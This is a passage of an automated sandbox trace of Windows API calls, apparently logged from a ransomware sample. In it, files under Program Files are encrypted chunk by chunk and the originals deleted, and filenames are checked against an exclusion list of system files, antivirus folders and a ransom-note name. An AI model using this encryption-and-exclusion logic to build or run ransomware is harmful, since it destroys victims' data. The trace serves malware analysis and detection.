lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.653] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.653] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.653] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.653] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.653] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.653] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.653] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.653] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.653] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.654] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.654] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.654] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.654] GetLastError () returned 0x0 [0169.655] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.655] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.764] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.764] GetLastError () returned 0x0 [0169.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.764] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.764] GetLastError () returned 0x0 [0169.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.764] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.764] GetLastError () returned 0x0 [0169.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.765] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0169.765] GetLastError () returned 0x0 [0169.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0169.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0169.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0169.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll")) returned 0x20 [0169.765] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", dwFileAttributes=0x20) returned 0 [0169.765] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 1 [0169.766] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll")) returned 0 [0169.766] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" [0169.766] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 1 [0169.766] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAC4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxac4.tmp")) returned 0xac4 [0169.767] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAC4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxac4.tmp"), dwFlags=0x1) returned 0 [0169.767] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAC4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxac4.tmp")) returned 1 [0169.768] CryptDestroyKey (hKey=0x9ad578) returned 1 [0169.768] wcslen (_String="OK") returned 0x2 [0169.768] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.768] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.768] CryptDestroyKey (hKey=0x9ad138) returned 1 [0169.768] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0169.768] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0169.768] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.dll", pszSpec="*NMCRYPT") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.dll", pszSpec="*Recovers your files.html") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.dll", pszSpec="*.exe") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.dll", pszSpec="*.dll") returned 1 [0169.768] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*NMCRYPT") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*Recovers your files.html") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.exe") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.dll") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.lnk") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.bat") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.ini") returned 0 [0169.768] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.msi") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*.scf") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*pagefile.sys*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*NTUSER.DAT*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*AppData*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\winrar\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\java\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\TeamViewer\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\windows\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\ESET\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\AVG\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\AVIRA\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*\\AVAST Software\\*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*Atheros*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*Realtek*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*bootmgr*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*boot*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*boot*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*CONFIG.SYS*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*IO.SYS*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*MSDOS.SYS*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*NTDETECT.COM*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*ntldr*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*chrome*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*opera*") returned 0 [0169.769] PathMatchSpecW (pszFile="sqlxmlx.rll", pszSpec="*firefox*") returned 0 [0169.769] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", pszSpec="*") returned 1 [0169.769] strlen (_Str="NMoreira") returned 0x8 [0169.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.770] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 